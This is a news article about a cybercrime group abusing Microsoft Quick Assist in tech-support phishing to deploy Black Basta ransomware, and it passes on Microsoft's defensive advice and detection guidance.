Security

Cyber-crime

Crims abusing Microsoft Quick Assist to deploy Black Basta ransomware

Spoiler alert: it's not really IT support controlling your device


A cybercrime gang has been abusing Microsoft's Quick Assist application in social engineering attacks that ultimately allow the crew to infect victims with Black Basta ransomware.

This, according to Redmond, which said the campaign has been ongoing since mid-April, and blamed a financially motivated group it tracks as Storm-1811 for the intrusions.

Microsoft did not immediately respond to The Register's questions about the attack, including how many customers have been hit. We will update this story when we receive a response.

Quick Assist is a software tool installed by default in Windows 11 that allows someone to share their PC or macOS device with a remote user, typically in corporate IT, who can then control the computer remotely. This also makes it easier for scammers, posing as tech support, to trick people into giving them full access to the targeted device. 

"Microsoft is investigating the use of Quick Assist in these attacks and is working on improving the transparency and trust between helpers and sharers, and incorporating warning messages in Quick Assist to alert users about possible tech support scams," the Windows giant said in a Wednesday alert.

Additionally, organizations can block or uninstall Quick Assist and other remote management tools if they aren't using them, which will help reduce their risk of these types of social engineering attacks, Microsoft advised. 

Plus, there's a whole list of indicators of compromise, and threat-hunting queries that Microsoft customers can use to look for malicious activity on their networks, such as suspicious curl behavior or possible malicious use of proxy or tunneling tool.

The break-ins begin with Storm-1811 impersonating IT support through voice phishing, and convincing the user to give them access to the computer through Quick Assist. In some cases users are bombarded with spam emails and then contacted asking if they want help fixing the problem.

Access is granted via a key command, and a security code provided by the attacker. After the target enters the security code, they can then share their screen with the attacker, who can select "Request Control." If the target approves this request, the fraudster now has full control of the device.

After this pwnage Storm-1811 gets to work delivering malicious payloads and remote monitoring and management (RMM) software, we're told.

"In several cases, Microsoft Threat Intelligence identified such activity leading to the download of Qakbot, RMM tools like ScreenConnect and NetSupport Manager, and Cobalt Strike," the threat intel team noted.

This persistent access to the compromised device allows the attackers to move laterally through the victim's environment. "Storm-1811 then uses PsExec to deploy Black Basta ransomware throughout the network," according to Microsoft. ®

Send us news
12 Comments

Microsoft sues 'foreign-based' cyber-crooks, seizes sites used to abuse AI

Scumbags stole API keys, then started a hacking-as-a-service biz, it is claimed

Ransomware crew abuses AWS native encryption, sets data-destruct timer for 7 days

'Codefinger' crims on the hunt for compromised keys

Russia's Star Blizzard phishing crew caught targeting WhatsApp accounts

FSB cyberspies venture into a new app for espionage, Microsoft says

Microsoft eggheads say AI can never be made secure – after testing Redmond's own products

If you want a picture of the future, imagine your infosec team stamping on software forever

Atos denies Space Bears' ransomware claims – with a 'but'

Points finger at third-party infrastructure being breached

Miscreants 'mass exploited' Fortinet firewalls, 'highly probable' zero-day used

Ransomware 'not off the table,' Arctic Wolf threat hunter tells El Reg

UK floats ransomware payout ban for public sector

Stronger proposals may also see private sector applying for a payment 'license'

How Windows got to version 3 – an illustrated history

With added manga and snark. What's not to like?

Medusa ransomware group claims attack on UK's Gateshead Council

Pastes allegedly stolen documents on leak site with £600K demand

Mitel 0-day, 5-year-old Oracle RCE bug under active exploit

3 CVEs added to CISA's catalog

The unlicensed OneDrive free ride ends this month

Kind old Microsoft is worried about security and compliance ... nothing to do with a free storage loophole

Chinese cyber-spies peek over shoulder of officials probing real-estate deals near American military bases

Gee, wonder why Beijing is so keen on the – checks notes – Committee on Foreign Investment in the US